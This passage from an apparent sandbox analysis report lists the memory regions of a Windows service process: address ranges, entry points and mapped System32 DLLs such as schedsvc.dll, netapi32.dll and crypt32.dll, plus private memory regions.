start_va = 0x7fefa7a0000
end_va = 0x7fefa8b1fff
monitored = 0
entry_point = 0x7fefa7bf354
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 2560
start_va = 0x7fefa8c0000
end_va = 0x7fefa8c8fff
monitored = 0
entry_point = 0x7fefa8c3668
region_type = mapped_file
name = "fvecerts.dll"
filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll")
Region:
id = 2561
start_va = 0x7fefa8d0000
end_va = 0x7fefa8d8fff
monitored = 0
entry_point = 0x7fefa8d1020
region_type = mapped_file
name = "tbs.dll"
filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll")
Region:
id = 2562
start_va = 0x7fefa8e0000
end_va = 0x7fefa935fff
monitored = 0
entry_point = 0x7fefa8e1040
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 2563
start_va = 0x7fefa960000
end_va = 0x7fefa9bdfff
monitored = 0
entry_point = 0x7fefa969024
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 2564
start_va = 0x7fefacc0000
end_va = 0x7fefacd3fff
monitored = 0
entry_point = 0x7fefacc3e64
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 2565
start_va = 0x7fefad60000
end_va = 0x7fefadc6fff
monitored = 0
entry_point = 0x7fefad76060
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 2566
start_va = 0x7fefade0000
end_va = 0x7fefadeafff
monitored = 0
entry_point = 0x7fefade4f8c
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 2567
start_va = 0x7fefaf20000
end_va = 0x7fefaf2bfff
monitored = 0
entry_point = 0x7fefaf215d8
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 2568
start_va = 0x7fefaf30000
end_va = 0x7fefaf3ffff
monitored = 0
entry_point = 0x7fefaf3835c
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 2569
start_va = 0x7fefaf40000
end_va = 0x7fefaf58fff
monitored = 0
entry_point = 0x7fefaf411a8
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 2570
start_va = 0x7fefaf60000
end_va = 0x7fefaf96fff
monitored = 0
entry_point = 0x7fefaf68424
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 2571
start_va = 0x7fefafd0000
end_va = 0x7fefafe4fff
monitored = 0
entry_point = 0x7fefafd60d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 2572
start_va = 0x7fefaff0000
end_va = 0x7fefb0b1fff
monitored = 0
entry_point = 0x7fefaff101c
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 2573
start_va = 0x7fefb170000
end_va = 0x7fefb18cfff
monitored = 0
entry_point = 0x7fefb172f18
region_type = mapped_file
name = "mmcss.dll"
filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll")
Region:
id = 2574
start_va = 0x7fefb190000
end_va = 0x7fefb198fff
monitored = 0
entry_point = 0x7fefb191010
region_type = mapped_file
name = "avrt.dll"
filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll")
Region:
id = 2575
start_va = 0x7fefb280000
end_va = 0x7fefb2acfff
monitored = 0
entry_point = 0x7fefb281010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 2576
start_va = 0x7fefb420000
end_va = 0x7fefb434fff
monitored = 0
entry_point = 0x7fefb421050
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 2577
start_va = 0x7fefb440000
end_va = 0x7fefb44bfff
monitored = 0
entry_point = 0x7fefb4418a4
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 2578
start_va = 0x7fefb450000
end_va = 0x7fefb465fff
monitored = 0
entry_point = 0x7fefb4511a0
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 2579
start_va = 0x7fefb6b0000
end_va = 0x7fefb6c0fff
monitored = 0
entry_point = 0x7fefb6b1070
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 2580
start_va = 0x7fefb6e0000
end_va = 0x7fefb714fff
monitored = 0
entry_point = 0x7fefb6e1064
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 2581
start_va = 0x7fefbb50000
end_va = 0x7fefbba5fff
monitored = 0
entry_point = 0x7fefbb5bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2582
start_va = 0x7fefbbb0000
end_va = 0x7fefbcdbfff
monitored = 0
entry_point = 0x7fefbbb94bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 2583
start_va = 0x7fefbe80000
end_va = 0x7fefbe9cfff
monitored = 0
entry_point = 0x7fefbe81ef4
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 2584
start_va = 0x7fefbed0000
end_va = 0x7fefc0c3fff
monitored = 0
entry_point = 0x7fefc05c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 2585
start_va = 0x7fefc3c0000
end_va = 0x7fefc3cbfff
monitored = 0
entry_point = 0x7fefc3c1064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 2586
start_va = 0x7fefc490000
end_va = 0x7fefc496fff
monitored = 0
entry_point = 0x7fefc4914b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 2587
start_va = 0x7fefc550000
end_va = 0x7fefc55cfff
monitored = 0
entry_point = 0x7fefc551348
region_type = mapped_file
name = "pcwum.dll"
filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")
Region:
id = 2588
start_va = 0x7fefc590000
end_va = 0x7fefc5aafff
monitored = 0
entry_point = 0x7fefc592068
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 2589
start_va = 0x7fefc5b0000
end_va = 0x7fefc5cdfff
monitored = 0
entry_point = 0x7fefc5b13b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 2590
start_va = 0x7fefc680000
end_va = 0x7fefc6b8fff
monitored = 0
entry_point = 0x7fefc68c0f0
region_type = mapped_file
name = "ubpm.dll"
filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 2591
start_va = 0x7fefc6c0000
end_va = 0x7fefc6c9fff
monitored = 0
entry_point = 0x7fefc6c3cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 2592
start_va = 0x7fefc7f0000
end_va = 0x7fefc836fff
monitored = 0
entry_point = 0x7fefc7f1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2593
start_va = 0x7fefc8e0000
end_va = 0x7fefc90ffff
monitored = 0
entry_point = 0x7fefc8e194c
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 2594
start_va = 0x7fefca80000
end_va = 0x7fefca86fff
monitored = 0
entry_point = 0x7fefca8142c
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 2595
start_va = 0x7fefca90000
end_va = 0x7fefcae4fff
monitored = 0
entry_point = 0x7fefca91054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 2596
start_va = 0x7fefcaf0000
end_va = 0x7fefcb07fff
monitored = 0
entry_point = 0x7fefcaf3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 2597
start_va = 0x7fefcc00000
end_va = 0x7fefcc31fff
monitored = 0
entry_point = 0x7fefcc0144c
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 2598
start_va = 0x7fefccd0000
end_va = 0x7fefccfefff
monitored = 0
entry_point = 0x7fefccd1064
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 2599
start_va = 0x7fefcd10000
end_va = 0x7fefcd19fff
monitored = 0
entry_point = 0x7fefcd13b40
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 2600
start_va = 0x7fefcd20000
end_va = 0x7fefcd8cfff
monitored = 0
entry_point = 0x7fefcd21010
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 2601
start_va = 0x7fefcfe0000
end_va = 0x7fefd002fff
monitored = 0
entry_point = 0x7fefcfe1198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 2602
start_va = 0x7fefd090000
end_va = 0x7fefd09afff
monitored = 0
entry_point = 0x7fefd091030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 2603
start_va = 0x7fefd0c0000
end_va = 0x7fefd0e4fff
monitored = 0
entry_point = 0x7fefd0c9658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2604
start_va = 0x7fefd0f0000
end_va = 0x7fefd0fefff
monitored = 0
entry_point = 0x7fefd0f1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2605
start_va = 0x7fefd100000
end_va = 0x7fefd190fff
monitored = 0
entry_point = 0x7fefd101440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 2606
start_va = 0x7fefd1a0000
end_va = 0x7fefd1dcfff
monitored = 0
entry_point = 0x7fefd1a18f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 2607
start_va = 0x7fefd1e0000
end_va = 0x7fefd1f3fff
monitored = 0
entry_point = 0x7fefd1e10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 2608
start_va = 0x7fefd200000
end_va = 0x7fefd20efff
monitored = 0
entry_point = 0x7fefd2019b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2609
start_va = 0x7fefd2a0000
end_va = 0x7fefd2aefff
monitored = 0
entry_point = 0x7fefd2a1020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 2610
start_va = 0x7fefd2b0000
end_va = 0x7fefd2c9fff
monitored = 0
entry_point = 0x7fefd2b1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 2611
start_va = 0x7fefd2d0000
end_va = 0x7fefd33bfff
monitored = 0
entry_point = 0x7fefd2d2780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2612
start_va = 0x7fefd3e0000
end_va = 0x7fefd415fff
monitored = 0
entry_point = 0x7fefd3e1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 2613
start_va = 0x7fefd420000
end_va = 0x7fefd58cfff
monitored = 0
entry_point = 0x7fefd4210b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 2614
start_va = 0x7fefd590000
end_va = 0x7fefd5cafff
monitored = 0
entry_point = 0x7fefd591324
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 2615
start_va = 0x7fefd5d0000
end_va = 0x7fefd7d2fff
monitored = 0
entry_point = 0x7fefd5f3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2616
start_va = 0x7fefd860000
end_va = 0x7fefd8acfff
monitored = 0
entry_point = 0x7fefd861070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2617
start_va = 0x7fefd8b0000
end_va = 0x7fefd94efff
monitored = 0
entry_point = 0x7fefd8b25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2618
start_va = 0x7fefd950000
end_va = 0x7fefd9e8fff
monitored = 0
entry_point = 0x7fefd951c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2619
start_va = 0x7fefd9f0000
end_va = 0x7fefdaf8fff
monitored = 0
entry_point = 0x7fefd9f1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2620
start_va = 0x7fefdb00000
end_va = 0x7fefdcd6fff
monitored = 0
entry_point = 0x7fefdb01010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 2621
start_va = 0x7fefdce0000
end_va = 0x7fefdda8fff
monitored = 0
entry_point = 0x7fefdd5a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2622
start_va = 0x7fefddb0000
end_va = 0x7fefeb37fff
monitored = 0
entry_point = 0x7fefde2cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 2623
start_va = 0x7fefed60000
end_va = 0x7fefed6dfff
monitored = 0
entry_point = 0x7fefed61080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2624
start_va = 0x7fefed70000
end_va = 0x7fefed77fff
monitored = 0
entry_point = 0x7fefed71504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2625
start_va = 0x7feff130000
end_va = 0x7feff181fff
monitored = 0
entry_point = 0x7feff1310d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 2626
start_va = 0x7feff190000
end_va = 0x7feff1aefff
monitored = 0
entry_point = 0x7feff1960e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2627
start_va = 0x7feff1b0000
end_va = 0x7feff1ddfff
monitored = 0
entry_point = 0x7feff1b1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2628
start_va = 0x7feff1e0000
end_va = 0x7feff246fff
monitored = 0
entry_point = 0x7feff1eb03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2629
start_va = 0x7feff250000
end_va = 0x7feff37cfff
monitored = 0
entry_point = 0x7feff29ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2630
start_va = 0x7feff380000
end_va = 0x7feff456fff
monitored = 0
entry_point = 0x7feff383274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2631
start_va = 0x7feff460000
end_va = 0x7feff53afff
monitored = 0
entry_point = 0x7feff480760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2632
start_va = 0x7feff540000
end_va = 0x7feff5b0fff
monitored = 0
entry_point = 0x7feff551e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2633
start_va = 0x7feff5d0000
end_va = 0x7feff5d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2634
start_va = 0x7fffff94000
end_va = 0x7fffff95fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff94000"
filename = ""
Region:
id = 2635
start_va = 0x7fffff96000
end_va = 0x7fffff97fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff96000"
filename = ""
Region:
id = 2636
start_va = 0x7fffff98000
end_va = 0x7fffff99fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff98000"
filename = ""
Region:
id = 2637
start_va = 0x7fffff9a000
end_va = 0x7fffff9bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9a000"
filename = ""
Region:
id = 2638
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 2639
start_va = 0x7fffff9e000
end_va = 0x7fffff9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9e000"
filename = ""
Region:
id = 2640
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 2641
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 2642
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 2643
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 2644
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 2645
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 2646
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 2647
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 2648
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2649
start_va = 0x7fffffd4000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 2650
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 2651
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 2652
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 2653
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 2654
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2655
start_va = 0x1d10000
end_va = 0x1d8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d10000"
filename = ""
Region:
id = 2656
start_va = 0x7fffff92000
end_va = 0x7fffff93fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff92000"
filename = ""
Region:
id = 2657
start_va = 0x9d0000
end_va = 0x9dffff
monitored = 0
entry_point = 0x9d3e64
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 2658
start_va = 0x9e0000
end_va = 0x9e3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 2659
start_va = 0x9d0000
end_va = 0x9dffff
monitored = 0
entry_point = 0x9d3e64
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 2660
start_va = 0x9e0000
end_va = 0x9e3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 2661
start_va = 0x7fef7f60000
end_va = 0x7fef804dfff
monitored = 0
entry_point = 0x7fef7f612a0
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 2701
start_va = 0x1c10000
end_va = 0x1c8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c10000"
filename = ""
Region:
id = 2702
start_va = 0x7fef7eb0000
end_va = 0x7fef7ee9fff
monitored = 0
entry_point = 0x7fef7ecd020
region_type = mapped_file
name = "wmisvc.dll"
filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")
Region:
id = 2703
start_va = 0x7fffff90000
end_va = 0x7fffff91fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff90000"
filename = ""
Region:
id = 2704
start_va = 0x7fef7e30000
end_va = 0x7fef7ea6fff
monitored = 0
entry_point = 0x7fef7e6e7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 2713
start_va = 0x7fefcc50000
end_va = 0x7fefcc71fff
monitored = 0
entry_point = 0x7fefcc55d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2714
start_va = 0x1e50000
end_va = 0x1ecffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e50000"
filename = ""
Region:
id = 2715
start_va = 0x7fef7dc0000
end_va = 0x7fef7dfcfff
monitored = 0
entry_point = 0x7fef7dc1070
region_type = mapped_file
name = "srvsvc.dll"
filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")
Region:
id = 2716
start_va = 0x7fffff8e000
end_va = 0x7fffff8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8e000"
filename = ""
Region:
id = 2717
start_va = 0x7fefad30000
end_va = 0x7fefad56fff
monitored = 0
entry_point = 0x7fefad398bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 2718
start_va = 0x7fefad20000
end_va = 0x7fefad2afff
monitored = 0
entry_point = 0x7fefad21198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 2720
start_va = 0x7fef7d90000
end_va = 0x7fef7db4fff
monitored = 0
entry_point = 0x7fef7da8c54
region_type = mapped_file
name = "browser.dll"
filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll")
Region:
id = 2721
start_va = 0x1f40000
end_va = 0x1fbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f40000"
filename = ""
Region:
id = 2722
start_va = 0x739c0000
end_va = 0x739c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "netmsg.dll"
filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll")
Region:
id = 2723
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 2724
start_va = 0x7fef7cf0000
end_va = 0x7fef7d81fff
monitored = 0
entry_point = 0x7fef7d651ec
region_type = mapped_file
name = "iphlpsvc.dll"
filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")
Region:
id = 2725
start_va = 0x7fefc3d0000
end_va = 0x7fefc48afff
monitored = 0
entry_point = 0x7fefc3d6de0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 2726
start_va = 0x7fefaa90000
end_va = 0x7fefaae2fff
monitored = 0
entry_point = 0x7fefaa92b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 2727
